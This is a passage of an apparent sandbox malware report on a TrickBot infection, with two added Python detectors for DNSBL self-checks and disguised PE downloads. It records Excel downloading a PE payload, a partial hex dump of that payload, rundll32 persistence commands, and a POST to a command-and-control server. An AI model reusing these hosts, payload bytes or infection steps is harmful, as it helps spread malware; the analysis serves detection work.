                                                                                                                                                                  Feb 20, 2021 02:03:50.790427923 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790455103 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790460110 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790466070 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790494919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790502071 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790520906 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790539980 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790544987 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790564060 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790585041 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790586948 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790611982 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790632963 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790641069 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790653944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790673971 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790728092 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790755033 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790774107 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790790081 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790796995 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790813923 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790833950 CET4916580192.168.2.22185.81.0.78

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 02:03:50.464174986 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:03:50.521975994 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:29.852530956 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:29.914756060 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:29.931988001 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:29.983189106 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:32.010483980 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:32.072875977 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:32.076400995 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:32.137552977 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:35.650758028 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:35.714725971 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:35.717183113 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:35.778270006 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:35.780849934 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:35.941054106 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:35.943697929 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:36.009109020 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 02:05:36.012715101 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 02:05:36.064273119 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 20, 2021 02:03:50.464174986 CET | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | www.chipmania.it | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:32.010483980 CET | 192.168.2.22 | 8.8.8.8 | 0x70c0 | Standard query (0) | wtfismyip.com | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:32.076400995 CET | 192.168.2.22 | 8.8.8.8 | 0x4ea4 | Standard query (0) | wtfismyip.com | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.650758028 CET | 192.168.2.22 | 8.8.8.8 | 0xc414 | Standard query (0) | 38.52.17.84.zen.spamhaus.org | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.717183113 CET | 192.168.2.22 | 8.8.8.8 | 0xd87a | Standard query (0) | 38.52.17.84.cbl.abuseat.org | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.780849934 CET | 192.168.2.22 | 8.8.8.8 | 0x6ac9 | Standard query (0) | 38.52.17.84.b.barracudacentral.org | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.943697929 CET | 192.168.2.22 | 8.8.8.8 | 0xd43a | Standard query (0) | 38.52.17.84.dnsbl-1.uceprotect.net | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:36.012715101 CET | 192.168.2.22 | 8.8.8.8 | 0x7164 | Standard query (0) | 38.52.17.84.spam.dnsbl.sorbs.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 20, 2021 02:03:50.521975994 CET | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | www.chipmania.it | chipmania.it | | CNAME (Canonical name) | IN (0x0001)
Feb 20, 2021 02:03:50.521975994 CET | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | chipmania.it | | 185.81.0.78 | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:32.072875977 CET | 8.8.8.8 | 192.168.2.22 | 0x70c0 | No error (0) | wtfismyip.com | | 95.217.228.176 | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:32.137552977 CET | 8.8.8.8 | 192.168.2.22 | 0x4ea4 | No error (0) | wtfismyip.com | | 95.217.228.176 | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.714725971 CET | 8.8.8.8 | 192.168.2.22 | 0xc414 | Name error (3) | 38.52.17.84.zen.spamhaus.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.778270006 CET | 8.8.8.8 | 192.168.2.22 | 0xd87a | Name error (3) | 38.52.17.84.cbl.abuseat.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:35.941054106 CET | 8.8.8.8 | 192.168.2.22 | 0x6ac9 | Name error (3) | 38.52.17.84.b.barracudacentral.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:36.009109020 CET | 8.8.8.8 | 192.168.2.22 | 0xd43a | Name error (3) | 38.52.17.84.dnsbl-1.uceprotect.net | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 02:05:36.064273119 CET | 8.8.8.8 | 192.168.2.22 | 0x7164 | Name error (3) | 38.52.17.84.spam.dnsbl.sorbs.net | none | none | A (IP address) | IN (0x0001)
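
The five DNSBL queries above carry the reversed octets of 84.17.52.38, which is exactly the address wtfismyip.com returned to the same host moments earlier (the HTTP session from wermgr.exe further down). The Name error (3) answers mean the address is not listed: a DNSBL answers a listed entry with a 127.0.0.x record and NXDOMAIN otherwise. A workstation asking an IP-echo service for its public address and then checking that address against several blocklists is a strong behavioural signal on its own. The Python below is an added example, not part of the sandbox report: it correlates the two signals over the query names and the echo reply copied from the tables on this page. The IP-echo service list and the DNSBL zone list are assumptions for illustration, not data taken from the report.

```python
import ipaddress

# Assumed lists (not from the report): a few public IP-echo services and the
# DNSBL zones seen in the queries above plus one more. Extend for real use.
IP_ECHO_SERVICES = {
    "wtfismyip.com", "icanhazip.com", "api.ipify.org", "ipinfo.io",
    "checkip.amazonaws.com", "ifconfig.me",
}
DNSBL_ZONES = {
    "zen.spamhaus.org", "cbl.abuseat.org", "b.barracudacentral.org",
    "dnsbl-1.uceprotect.net", "spam.dnsbl.sorbs.net", "bl.spamcop.net",
}

# Constructed sample: the query names from the report's DNS Queries table in
# the order they were sent, and the body of the wtfismyip.com/text reply.
SAMPLE_QUERIES = [
    "www.chipmania.it",
    "wtfismyip.com",
    "wtfismyip.com",
    "38.52.17.84.zen.spamhaus.org",
    "38.52.17.84.cbl.abuseat.org",
    "38.52.17.84.b.barracudacentral.org",
    "38.52.17.84.dnsbl-1.uceprotect.net",
    "38.52.17.84.spam.dnsbl.sorbs.net",
]
SAMPLE_ECHO_REPLY = "84.17.52.38\n"


def dnsbl_lookup(qname):
    """If qname is a reversed-octet DNSBL query (d.c.b.a.<zone>), return
    (the queried IP in normal order, zone); otherwise None."""
    qname = qname.rstrip(".").lower()
    for zone in DNSBL_ZONES:
        if not qname.endswith("." + zone):
            continue
        octets = qname[: -len(zone) - 1].split(".")
        if len(octets) != 4:
            return None
        try:
            ip = ipaddress.IPv4Address(".".join(reversed(octets)))
        except ipaddress.AddressValueError:
            return None
        return str(ip), zone
    return None


def echoed_ip(reply_body):
    """Parse the plain-text body an IP-echo service returns."""
    try:
        return str(ipaddress.IPv4Address(reply_body.strip()))
    except ipaddress.AddressValueError:
        return None


def detect_self_blocklist_check(queries, echo_reply=None):
    """Correlate IP-echo lookups with DNSBL queries for the same address.

    'self_check' is True when the host queried blocklists for the very IP an
    echo service just told it about, the pattern in this report."""
    echo_hits = [q for q in queries if q.rstrip(".").lower() in IP_ECHO_SERVICES]
    checks = [hit for hit in map(dnsbl_lookup, queries) if hit]
    checked_ips = {ip for ip, _ in checks}
    public_ip = echoed_ip(echo_reply) if echo_reply else None
    return {
        "echo_services_queried": sorted(set(echo_hits)),
        "public_ip": public_ip,
        "dnsbl_checks": checks,
        "self_check": public_ip is not None and public_ip in checked_ips,
        # Even without the echo reply, several zones queried for one IP from a
        # client that is not a mail server is worth an alert on its own.
        "zones_per_ip": {ip: sum(1 for i, _ in checks if i == ip) for ip in checked_ips},
    }


if __name__ == "__main__":
    print(detect_self_blocklist_check(SAMPLE_QUERIES, SAMPLE_ECHO_REPLY))
```

Run over passive-DNS or resolver logs, the correlation key is the client IP plus a short time window; here both signals come from the same sandbox host within a few seconds, so the sample simply feeds the full query list in order.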

HTTP Request Dependency Graph

• www.chipmania.it
• wtfismyip.com
• 116.68.162.92:443

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 20, 2021 02:03:50.604053020 CET | 2 | OUT | GET /mails/open.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.chipmania.it
Connection: Keep-Alive
Feb 20, 2021 02:03:50.669842005 CET | 3 | IN | HTTP/1.1 200 OK
Date: Sat, 20 Feb 2021 01:03:50 GMT
Server: Apache
Content-Disposition: attachment; filename="10.jjkes"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=1, max=100
Transfer-Encoding: chunked
Content-Type: application/octet-stream
                                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 
74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3
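
Session 0 is the Excel process pulling the second stage: the server returns application/octet-stream with Content-Disposition filename "10.jjkes", chunked, and the body in the hex dump starts with the chunk size "2000\r\n" followed by 4d 5a, the MZ DOS stub, with e_lfanew (offset 0x3c) pointing at the "PE\0\0" signature further in. A proxy or sensor catches this by decoding the chunked body and checking the PE signature instead of trusting the extension or the Content-Type. The Python below is an added example, not code from the report or from the sandbox vendor. Because the page shows only the first bytes of the real file, the sample rebuilds the response from the headers listed above over a hand-built, clearly labelled PE-shaped payload (e_lfanew = 0x40 in the sample; 0x110 in the real file).

```python
import re

# Extensions under which a PE image is at least not lying about what it is.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".drv"}


def decode_chunked(body):
    """Decode an HTTP/1.1 chunked transfer-coded body (RFC 7230 section 4.1)."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            break                                      # last-chunk; trailers ignored
        out += body[pos:pos + size]
        pos += size + 2                                # skip the CRLF after chunk-data
    return bytes(out)


def parse_response(raw):
    """Split a raw HTTP response into (status line, header dict, decoded body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = decode_chunked(body)
    return lines[0], headers, body


def looks_like_pe(data):
    """True if data starts with an MZ DOS stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def attachment_filename(headers):
    m = re.search(r'filename\*?="?([^";]+)"?', headers.get("content-disposition", ""))
    return m.group(1) if m else None


def assess_download(raw):
    """Flag a response that delivers a PE image under a non-executable name."""
    status, headers, body = parse_response(raw)
    name = attachment_filename(headers)
    ext = "." + name.rsplit(".", 1)[-1].lower() if name and "." in name else ""
    is_pe = looks_like_pe(body)
    return {
        "status": status,
        "filename": name,
        "content_type": headers.get("content-type"),
        "is_pe": is_pe,
        "disguised_pe": is_pe and ext not in PE_EXTENSIONS,
        "body_len": len(body),
    }


# Constructed sample (not the report's bytes): the report's response headers
# over a minimal hand-built PE-shaped payload, split into two chunks so the
# decoder's chunk handling is exercised.
def _build_sample():
    dos = b"MZ\x90\x00" + b"\x00" * 0x38 + (0x40).to_bytes(4, "little")  # e_lfanew = 0x40
    payload = dos + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 42           # i386 COFF stub
    chunks = [payload[:0x30], payload[0x30:]]
    body = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in chunks) + b"0\r\n\r\n"
    head = (b"HTTP/1.1 200 OK\r\n"
            b"Server: Apache\r\n"
            b"Content-Disposition: attachment; filename=\"10.jjkes\"\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"Content-Type: application/octet-stream\r\n\r\n")
    return head + body, payload


SAMPLE_RESPONSE, SAMPLE_PAYLOAD = _build_sample()

if __name__ == "__main__":
    print(assess_download(SAMPLE_RESPONSE))
```

The check is deliberately on the decoded body: a signature applied to the raw wire bytes would see the chunk-size line "2000\r\n" first and miss the MZ header, which is exactly what the hex dump above shows.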


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 95.217.228.176 | 80 | C:\Windows\System32\wermgr.exe
Timestamp | kBytes transferred | Direction | Data
Feb 20, 2021 02:05:32.203285933 CET | 4953 | OUT | GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.71.0
Host: wtfismyip.com
Feb 20, 2021 02:05:32.267560005 CET | 4953 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Sat, 20 Feb 2021 01:05:32 GMT
Content-Length: 12
Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 0a
Data Ascii: 84.17.52.38
Feb 20, 2021 02:05:32.545891047 CET | 4954 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Sat, 20 Feb 2021 01:05:32 GMT
Content-Length: 12
Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 0a
Data Ascii: 84.17.52.38


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49176
Destination IP: 116.68.162.92
Destination Port: 443
Process: C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
Feb 20, 2021 02:05:55.532516956 CET | 6133 | OUT | POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGI
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 116.68.162.92:443
Content-Length: 282
Cache-Control: no-cache
Feb 20, 2021 02:05:58.101294994 CET | 6137 | IN | HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Sat, 20 Feb 2021 01:05:56 GMT
content-length: 3
Content-Type: text/plain
Data Raw: 2f 31 2f
Data Ascii: /1/


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 20, 2021 02:05:29.234872103 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49170 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 02:05:40.075192928 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49173 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 02:05:50.281522989 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49175 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 02:05:53.685561895 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49177 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 02:05:56.148684025 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49178 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 02:05:59.279273987 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49179 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 02:03:35
Start date: 20/02/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f330000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:03:41
Start date: 20/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase: 0xff2f0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:03:41
Start date: 20/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase: 0x960000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 02:03:43
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xffc90000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 02:03:43
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xffc90000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 02:05:29
Start date: 20/02/2021
Path: C:\Windows\System32\taskeng.exe
Wow64 process (32bit): false
Commandline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase: 0xfffe0000
File size: 464384 bytes
MD5 hash: 65EA57712340C09B1B0C427B4848AE05
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 02:05:29
Start date: 20/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
Imagebase: 0xff2c0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:05:36
Start date: 20/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe
Imagebase: 0xff0e0000
File size: 27136 bytes
MD5 hash: C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

